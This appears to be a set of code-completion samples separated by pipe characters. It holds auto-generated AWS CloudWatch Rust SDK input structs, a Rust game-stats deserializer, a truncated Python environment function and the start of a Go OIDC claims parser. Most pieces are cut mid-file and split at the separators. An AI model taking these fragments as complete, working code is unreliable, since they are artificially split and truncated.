pub struct GetMetricStreamInput {
/// <p>The name of the metric stream to retrieve information about.</p>
pub name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetMetricStreamInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricStreamInput");
formatter.field("name", &self.name);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricStatisticsInput {
/// <p>The namespace of the metric, with or without spaces.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The name of the metric, with or without spaces.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The dimensions. If the metric contains multiple dimensions, you must include a value for each dimension. CloudWatch treats each unique combination of dimensions as a separate metric.
/// If a specific combination of dimensions was not published, you can't retrieve statistics for it.
/// You must specify the same dimensions that were used when the metrics were created. For an example,
/// see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#dimension-combinations">Dimension Combinations</a> in the <i>Amazon CloudWatch User Guide</i>. For more information about specifying dimensions, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/publishingMetrics.html">Publishing Metrics</a> in the
/// <i>Amazon CloudWatch User Guide</i>.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The time stamp that determines the first data point to return. Start times are
/// evaluated relative to the time that CloudWatch receives the request.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-03T23:00:00Z).</p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
pub start_time: std::option::Option<smithy_types::Instant>,
/// <p>The time stamp that determines the last data point to return.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.
/// In a raw HTTP query, the time stamp must be in ISO 8601 UTC format (for example, 2016-10-10T23:00:00Z).</p>
pub end_time: std::option::Option<smithy_types::Instant>,
/// <p>The granularity, in seconds, of the returned data points. For metrics with regular resolution, a period can
/// be as short as one minute (60 seconds) and must be a multiple of 60. For high-resolution metrics that are collected
/// at intervals of less than one minute, the period can be 1, 5, 10, 30, 60, or any multiple of 60. High-resolution metrics
/// are those metrics stored by a <code>PutMetricData</code> call that includes a <code>StorageResolution</code> of 1 second.</p>
/// <p>If the <code>StartTime</code> parameter specifies a time stamp that is greater than
/// 3 hours ago, you must specify the period as follows or no data points in that time range is returned:</p>
/// <ul>
/// <li>
/// <p>Start time between 3 hours and 15 days ago - Use a multiple of 60 seconds (1 minute).</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Use a multiple of 300 seconds (5 minutes).</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Use a multiple of 3600 seconds (1 hour).</p>
/// </li>
/// </ul>
pub period: std::option::Option<i32>,
/// <p>The metric statistics, other than percentile. For percentile statistics,
/// use <code>ExtendedStatistics</code>. When calling <code>GetMetricStatistics</code>, you must
/// specify either <code>Statistics</code> or <code>ExtendedStatistics</code>, but not both.</p>
pub statistics: std::option::Option<std::vec::Vec<crate::model::Statistic>>,
/// <p>The percentile statistics. Specify values between p0.0 and p100. When calling <code>GetMetricStatistics</code>, you must
/// specify either <code>Statistics</code> or <code>ExtendedStatistics</code>, but not both. Percentile statistics are not
/// available for metrics when any of the metric values are negative numbers.</p>
pub extended_statistics: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The unit for a given metric.
/// If you omit <code>Unit</code>, all data that was collected with any unit is returned, along with the corresponding units that were specified
/// when the data was reported to CloudWatch. If you specify a unit, the operation returns only data that was collected with that unit specified.
/// If you specify a unit that does not match the data collected, the results of the operation are null. CloudWatch does not perform unit conversions.</p>
pub unit: std::option::Option<crate::model::StandardUnit>,
}
impl std::fmt::Debug for GetMetricStatisticsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricStatisticsInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("start_time", &self.start_time);
formatter.field("end_time", &self.end_time);
formatter.field("period", &self.period);
formatter.field("statistics", &self.statistics);
formatter.field("extended_statistics", &self.extended_statistics);
formatter.field("unit", &self.unit);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricDataInput {
/// <p>The metric queries to be returned. A single <code>GetMetricData</code> call can include as many as 500 <code>MetricDataQuery</code>
/// structures. Each of these structures can specify either a metric to retrieve, or a math expression to perform on retrieved data. </p>
pub metric_data_queries: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
/// <p>The time stamp indicating the earliest data to be returned.</p>
/// <p>The value specified is inclusive; results include data points with the specified time stamp. </p>
/// <p>CloudWatch rounds the specified time stamp as follows:</p>
/// <ul>
/// <li>
/// <p>Start time less than 15 days ago - Round down to the nearest whole minute.
/// For example, 12:32:34 is rounded down to 12:32:00.</p>
/// </li>
/// <li>
/// <p>Start time between 15 and 63 days ago - Round down to the nearest 5-minute clock interval.
/// For example, 12:32:34 is rounded down to 12:30:00.</p>
/// </li>
/// <li>
/// <p>Start time greater than 63 days ago - Round down to the nearest 1-hour clock interval.
/// For example, 12:32:34 is rounded down to 12:00:00.</p>
/// </li>
/// </ul>
/// <p>If you set <code>Period</code> to 5, 10, or 30, the start time of your request is
/// rounded down to the nearest time that corresponds to even 5-, 10-, or 30-second divisions
/// of a minute. For example, if you make a query at (HH:mm:ss) 01:05:23 for the previous
/// 10-second period, the start time of your request is rounded down and you receive data from 01:05:10 to
/// 01:05:20. If you make a query at 15:07:17 for the previous 5 minutes of data, using a
/// period of 5 seconds, you receive data
/// timestamped between 15:02:15 and 15:07:15.
/// </p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>StartTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>StartTime</code>.</p>
pub start_time: std::option::Option<smithy_types::Instant>,
/// <p>The time stamp indicating the latest data to be returned.</p>
/// <p>The value specified is exclusive; results include data points up to the specified time stamp.</p>
/// <p>For better performance, specify <code>StartTime</code> and <code>EndTime</code>
/// values that align with the value of the metric's <code>Period</code> and sync up with
/// the beginning and end of an hour. For example, if the <code>Period</code> of a metric
/// is 5 minutes, specifying 12:05 or 12:30 as <code>EndTime</code> can get a faster response
/// from CloudWatch than setting 12:07 or 12:29 as the <code>EndTime</code>.</p>
pub end_time: std::option::Option<smithy_types::Instant>,
/// <p>Include this value, if it was returned by the previous <code>GetMetricData</code> operation,
/// to get the next set of data points.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The order in which data points should be returned. <code>TimestampDescending</code> returns the newest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached. <code>TimestampAscending</code> returns the oldest data first and paginates
/// when the <code>MaxDatapoints</code> limit is reached.</p>
pub scan_by: std::option::Option<crate::model::ScanBy>,
/// <p>The maximum number of data points the request should return before paginating. If you omit
/// this, the default of 100,800 is used.</p>
pub max_datapoints: std::option::Option<i32>,
/// <p>This structure includes the <code>Timezone</code> parameter, which you can use
/// to specify your time zone so that the labels of returned data display the
/// correct time
/// for your time zone. </p>
pub label_options: std::option::Option<crate::model::LabelOptions>,
}
impl std::fmt::Debug for GetMetricDataInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricDataInput");
formatter.field("metric_data_queries", &self.metric_data_queries);
formatter.field("start_time", &self.start_time);
formatter.field("end_time", &self.end_time);
formatter.field("next_token", &self.next_token);
formatter.field("scan_by", &self.scan_by);
formatter.field("max_datapoints", &self.max_datapoints);
formatter.field("label_options", &self.label_options);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetInsightRuleReportInput {
/// <p>The name of the rule that you want to see data from.</p>
pub rule_name: std::option::Option<std::string::String>,
/// <p>The start time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub start_time: std::option::Option<smithy_types::Instant>,
/// <p>The end time of the data to use in the report. When used in a raw HTTP Query API, it is formatted as
/// <code>yyyy-MM-dd'T'HH:mm:ss</code>. For example,
/// <code>2019-07-01T23:59:59</code>.</p>
pub end_time: std::option::Option<smithy_types::Instant>,
/// <p>The period, in seconds, to use for the statistics in the <code>InsightRuleMetricDatapoint</code> results.</p>
pub period: std::option::Option<i32>,
/// <p>The maximum number of contributors to include in the report. The range is 1 to 100. If you omit this, the default of 10 is used.</p>
pub max_contributor_count: std::option::Option<i32>,
/// <p>Specifies which metrics to use for aggregation of contributor values for the report. You can specify one or more
/// of the following metrics:</p>
/// <ul>
/// <li>
/// <p>
/// <code>UniqueContributors</code> -- the number of unique contributors for each data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>MaxContributorValue</code> -- the value of the top contributor for each data point. The identity of the
/// contributor might change for each data point in the graph.</p>
/// <p>If this rule aggregates by COUNT, the top contributor for each data point is the contributor with the
/// most occurrences in that period. If the rule aggregates by SUM, the top contributor is the contributor with the highest sum in the log field specified
/// by the rule's <code>Value</code>, during that period.</p>
/// </li>
/// <li>
/// <p>
/// <code>SampleCount</code> -- the number of data points matched by the rule.</p>
/// </li>
/// <li>
/// <p>
/// <code>Sum</code> -- the sum of the values from all contributors during the time period represented by that data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>Minimum</code> -- the minimum value from a single observation during the time period represented by that data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>Maximum</code> -- the maximum value from a single observation during the time period represented by that data point.</p>
/// </li>
/// <li>
/// <p>
/// <code>Average</code> -- the average value from all contributors during the time period represented by that data point.</p>
/// </li>
/// </ul>
pub metrics: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>Determines what statistic to use to rank the contributors. Valid values are SUM and MAXIMUM.</p>
pub order_by: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetInsightRuleReportInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetInsightRuleReportInput");
formatter.field("rule_name", &self.rule_name);
formatter.field("start_time", &self.start_time);
formatter.field("end_time", &self.end_time);
formatter.field("period", &self.period);
formatter.field("max_contributor_count", &self.max_contributor_count);
formatter.field("metrics", &self.metrics);
formatter.field("order_by", &self.order_by);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetDashboardInput {
/// <p>The name of the dashboard to be described.</p>
pub dashboard_name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetDashboardInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetDashboardInput");
formatter.field("dashboard_name", &self.dashboard_name);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EnableInsightRulesInput {
/// <p>An array of the rule names to enable. If you need to find out the names of your rules, use <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DescribeInsightRules.html">DescribeInsightRules</a>.</p>
pub rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for EnableInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("EnableInsightRulesInput");
formatter.field("rule_names", &self.rule_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct EnableAlarmActionsInput {
/// <p>The names of the alarms.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for EnableAlarmActionsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("EnableAlarmActionsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DisableInsightRulesInput {
/// <p>An array of the rule names to disable. If you need to find out the names of your rules, use <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DescribeInsightRules.html">DescribeInsightRules</a>.</p>
pub rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DisableInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DisableInsightRulesInput");
formatter.field("rule_names", &self.rule_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DisableAlarmActionsInput {
/// <p>The names of the alarms.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DisableAlarmActionsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DisableAlarmActionsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeInsightRulesInput {
/// <p>Include this value, if it was returned by the previous operation, to get the next set of rules.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The maximum number of results to return in one operation. If you omit this
/// parameter, the default of 500 is used.</p>
pub max_results: std::option::Option<i32>,
}
impl std::fmt::Debug for DescribeInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeInsightRulesInput");
formatter.field("next_token", &self.next_token);
formatter.field("max_results", &self.max_results);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAnomalyDetectorsInput {
/// <p>Use the token returned by the previous operation to request the next page of results.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The maximum number of results to return in one operation. The maximum
/// value that you can specify is 100.</p>
/// <p>To retrieve the remaining results, make another call with the returned
/// <code>NextToken</code> value. </p>
pub max_results: std::option::Option<i32>,
/// <p>Limits the results to only the anomaly detection models that
/// are associated with the specified namespace.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric name. If there are multiple metrics with this name in different
/// namespaces that have anomaly detection models, they're all returned.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric dimensions. If there are multiple metrics that have these dimensions
/// and have anomaly detection models associated, they're all returned.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
}
impl std::fmt::Debug for DescribeAnomalyDetectorsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAnomalyDetectorsInput");
formatter.field("next_token", &self.next_token);
formatter.field("max_results", &self.max_results);
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAlarmsForMetricInput {
/// <p>The name of the metric.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The namespace of the metric.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The statistic for the metric, other than percentiles.
/// For percentile statistics, use <code>ExtendedStatistics</code>.</p>
pub statistic: std::option::Option<crate::model::Statistic>,
/// <p>The percentile statistic for the metric. Specify a value between
/// p0.0 and p100.</p>
pub extended_statistic: std::option::Option<std::string::String>,
/// <p>The dimensions associated with the metric. If the metric has any associated
/// dimensions, you must specify them in order for the call to succeed.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The period, in seconds, over which the statistic is applied.</p>
pub period: std::option::Option<i32>,
/// <p>The unit for the metric.</p>
pub unit: std::option::Option<crate::model::StandardUnit>,
}
impl std::fmt::Debug for DescribeAlarmsForMetricInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAlarmsForMetricInput");
formatter.field("metric_name", &self.metric_name);
formatter.field("namespace", &self.namespace);
formatter.field("statistic", &self.statistic);
formatter.field("extended_statistic", &self.extended_statistic);
formatter.field("dimensions", &self.dimensions);
formatter.field("period", &self.period);
formatter.field("unit", &self.unit);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAlarmsInput {
/// <p>The names of the alarms to retrieve information about.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>An alarm name prefix. If you specify this parameter, you receive information about all alarms that have names
/// that start with this prefix.</p>
/// <p>If this parameter
/// is specified, you cannot specify <code>AlarmNames</code>.</p>
pub alarm_name_prefix: std::option::Option<std::string::String>,
/// <p>Use this parameter to specify whether you want the operation to return metric alarms or composite alarms. If you omit this parameter,
/// only metric alarms are returned.</p>
pub alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
/// <p>If you use this parameter and specify the name of a composite alarm, the operation returns
/// information about the "children" alarms
/// of the alarm you specify. These are the metric alarms and composite alarms referenced in the
/// <code>AlarmRule</code> field of the composite alarm that you specify in
/// <code>ChildrenOfAlarmName</code>. Information about the composite alarm that you name in
/// <code>ChildrenOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ChildrenOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you
/// receive a validation
/// error.</p>
/// <note>
/// <p>Only the <code>Alarm Name</code>, <code>ARN</code>, <code>StateValue</code> (OK/ALARM/INSUFFICIENT_DATA), and <code>StateUpdatedTimestamp</code>
/// information are returned by this operation
/// when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub children_of_alarm_name: std::option::Option<std::string::String>,
/// <p>If you use this parameter and specify the name of a metric or composite alarm, the operation returns
/// information about the "parent" alarms
/// of the alarm you specify. These are the composite alarms that have <code>AlarmRule</code>
/// parameters that reference
/// the alarm named in <code>ParentsOfAlarmName</code>. Information about the alarm that you specify in
/// <code>ParentsOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ParentsOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you receive a validation
/// error.</p>
/// <note>
/// <p>Only the Alarm Name and ARN are returned by this operation when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub parents_of_alarm_name: std::option::Option<std::string::String>,
/// <p>Specify this parameter to receive information only about alarms that are currently in the state that you specify.</p>
pub state_value: std::option::Option<crate::model::StateValue>,
/// <p>Use this parameter to filter the results of the operation to only those alarms that
/// use a certain alarm action. For example, you could specify the ARN of an SNS topic to find all
/// alarms that send notifications to that topic.</p>
pub action_prefix: std::option::Option<std::string::String>,
/// <p>The maximum number of alarm descriptions to retrieve.</p>
pub max_records: std::option::Option<i32>,
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub next_token: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DescribeAlarmsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAlarmsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.field("alarm_name_prefix", &self.alarm_name_prefix);
formatter.field("alarm_types", &self.alarm_types);
formatter.field("children_of_alarm_name", &self.children_of_alarm_name);
formatter.field("parents_of_alarm_name", &self.parents_of_alarm_name);
formatter.field("state_value", &self.state_value);
formatter.field("action_prefix", &self.action_prefix);
formatter.field("max_records", &self.max_records);
formatter.field("next_token", &self.next_token);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DescribeAlarmHistoryInput {
/// <p>The name of the alarm.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>Use this parameter to specify whether you want the operation to return metric alarms or composite alarms. If you omit this parameter,
/// only metric alarms are returned.</p>
pub alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
/// <p>The type of alarm histories to retrieve.</p>
pub history_item_type: std::option::Option<crate::model::HistoryItemType>,
/// <p>The starting date to retrieve alarm history.</p>
pub start_date: std::option::Option<smithy_types::Instant>,
/// <p>The ending date to retrieve alarm history.</p>
pub end_date: std::option::Option<smithy_types::Instant>,
/// <p>The maximum number of alarm history records to retrieve.</p>
pub max_records: std::option::Option<i32>,
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>Specified whether to return the newest or oldest alarm history first. Specify <code>TimestampDescending</code> to have the newest
/// event history returned first, and specify <code>TimestampAscending</code> to have the oldest history returned first.</p>
pub scan_by: std::option::Option<crate::model::ScanBy>,
}
impl std::fmt::Debug for DescribeAlarmHistoryInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DescribeAlarmHistoryInput");
formatter.field("alarm_name", &self.alarm_name);
formatter.field("alarm_types", &self.alarm_types);
formatter.field("history_item_type", &self.history_item_type);
formatter.field("start_date", &self.start_date);
formatter.field("end_date", &self.end_date);
formatter.field("max_records", &self.max_records);
formatter.field("next_token", &self.next_token);
formatter.field("scan_by", &self.scan_by);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteMetricStreamInput {
/// <p>The name of the metric stream to delete.</p>
pub name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DeleteMetricStreamInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteMetricStreamInput");
formatter.field("name", &self.name);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteInsightRulesInput {
/// <p>An array of the rule names to delete. If you need to find out the names of your rules, use <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DescribeInsightRules.html">DescribeInsightRules</a>.</p>
pub rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DeleteInsightRulesInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteInsightRulesInput");
formatter.field("rule_names", &self.rule_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteDashboardsInput {
/// <p>The dashboards to be deleted. This parameter is required.</p>
pub dashboard_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DeleteDashboardsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteDashboardsInput");
formatter.field("dashboard_names", &self.dashboard_names);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteAnomalyDetectorInput {
/// <p>The namespace associated with the anomaly detection model to delete.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The metric name associated with the anomaly detection model to delete.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The metric dimensions associated with the anomaly detection model to delete.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The statistic associated with the anomaly detection model to delete.</p>
pub stat: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DeleteAnomalyDetectorInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteAnomalyDetectorInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("stat", &self.stat);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DeleteAlarmsInput {
/// <p>The alarms to be deleted.</p>
pub alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for DeleteAlarmsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DeleteAlarmsInput");
formatter.field("alarm_names", &self.alarm_names);
formatter.finish()
}
} | |
seasonal.rs | //! Module for seasonal stats.
mod match_result;
mod rank;
mod season;
pub use self::match_result::MatchResult;
pub use self::rank::Rank;
pub use self::season::Season;
use crate::internals::utils::serde_parse_f64_option;
use crate::region::Region;
use chrono::{DateTime, NaiveDate, Utc};
use int_enum::IntEnum;
use serde::{Deserialize, Deserializer};
use std::collections::HashMap;
/// Deserialized seasonal stats.
#[derive(Deserialize, Clone, Debug)]
#[non_exhaustive]
pub struct SeasonalStats {
pub username: String,
pub platform: String,
pub ubisoft_id: String,
pub uplay_id: Option<String>,
pub avatar_url_146: Option<String>,
pub avatar_url_256: Option<String>,
pub last_updated: DateTime<Utc>,
pub seasons: HashMap<Season, SeasonInfo>,
}
/// Deserialized season info.
#[derive(Deserialize, Clone, Debug)]
#[non_exhaustive]
pub struct SeasonInfo {
pub name: String,
pub start_date: DateTime<Utc>,
pub end_date: Option<NaiveDate>,
pub regions: HashMap<Region, Vec<RegionInfo>>,
}
/// Deserialized region info.
#[derive(Deserialize, Clone, Debug)]
#[non_exhaustive]
pub struct RegionInfo {
#[serde(rename = "season_id")]
#[serde(deserialize_with = "deserialize_season")]
pub season: Season,
pub region: String,
pub abandons: u16,
pub losses: u16,
pub max_mmr: f32,
pub max_rank: Rank,
pub mmr: f32,
pub next_rank_mmr: f32,
pub prev_rank_mmr: f32,
pub rank: Rank,
pub skill_mean: f32,
pub skill_standard_deviation: f32,
pub created_for_date: DateTime<Utc>,
pub wins: u16,
pub kills: Option<u16>,
pub deaths: Option<u16>,
pub last_match_mmr_change: Option<i16>,
// The endpoint returns a string for this field
#[serde(deserialize_with = "serde_parse_f64_option")]
pub last_match_skill_mean_change: Option<f64>,
// The endpoint returns a string for this field
#[serde(deserialize_with = "serde_parse_f64_option")]
pub last_match_skill_standard_deviation_change: Option<f64>,
pub last_match_result: Option<MatchResult>,
pub champions_rank_position: Option<u16>,
pub rank_text: String,
pub rank_image: String,
pub max_rank_text: String,
pub max_rank_image: String,
}
fn deserialize_season<'de, D: Deserializer<'de>>(deserializer: D) -> Result<Season, D::Error> {
let id = u8::deserialize(deserializer)?;
Season::from_int(id).map_err(serde::de::Error::custom)
} | ||
reacher.py | import numpy as np
class StaticFns:
@staticmethod
def termination_fn(obs, act, next_obs):
done = np.array([False]).repeat(len(obs))
done = done[:,None] | return done |
|
oidc_verify.go | /* | Use of this software is governed by the Business Source License included in
the file licenses/BSL-Couchbase.txt. As of the Change Date specified in that
file, in accordance with the Business Source License, use of this software will
be governed by the Apache License, Version 2.0, included in the file
licenses/APL2.txt.
*/
package auth
import (
"bytes"
"encoding/base64"
"encoding/json"
"errors"
"fmt"
"github.com/coreos/go-oidc"
"strings"
"time"
"github.com/couchbase/sync_gateway/base"
pkgerrors "github.com/pkg/errors"
)
const (
issuerGoogleAccounts = "https://accounts.google.com"
issuerGoogleAccountsNoScheme = "accounts.google.com"
)
// Identity claims required for claims verification
type Identity struct {
Issuer string
Audience []string
Subject string
Expiry time.Time
IssuedAt time.Time
Email string
Claims map[string]interface{}
}
type IdentityJson struct {
Issuer string `json:"iss"`
Subject string `json:"sub"`
Audience audience `json:"aud"`
Expiry jsonTime `json:"exp"`
IssuedAt jsonTime `json:"iat"`
NotBefore *jsonTime `json:"nbf"`
Email string `json:"email"`
Claims map[string]interface{} `json:"-"`
}
// UnmarshalIdentityJSON raw claim bytes as IdentityJson
func UnmarshalIdentityJSON(claims []byte) (*IdentityJson, error) {
if len(claims) <= 0 {
return nil, errors.New("can't extract identity claims from an empty byte slice")
}
identity := IdentityJson{}
if err := json.Unmarshal(claims, &identity); err != nil {
return nil, err
}
decoder := base.JSONDecoder(bytes.NewReader(claims))
decoder.UseNumber()
if err := decoder.Decode(&identity.Claims); err != nil {
return nil, err
}
delete(identity.Claims, "iss")
delete(identity.Claims, "sub")
delete(identity.Claims, "aud")
delete(identity.Claims, "exp")
delete(identity.Claims, "iat")
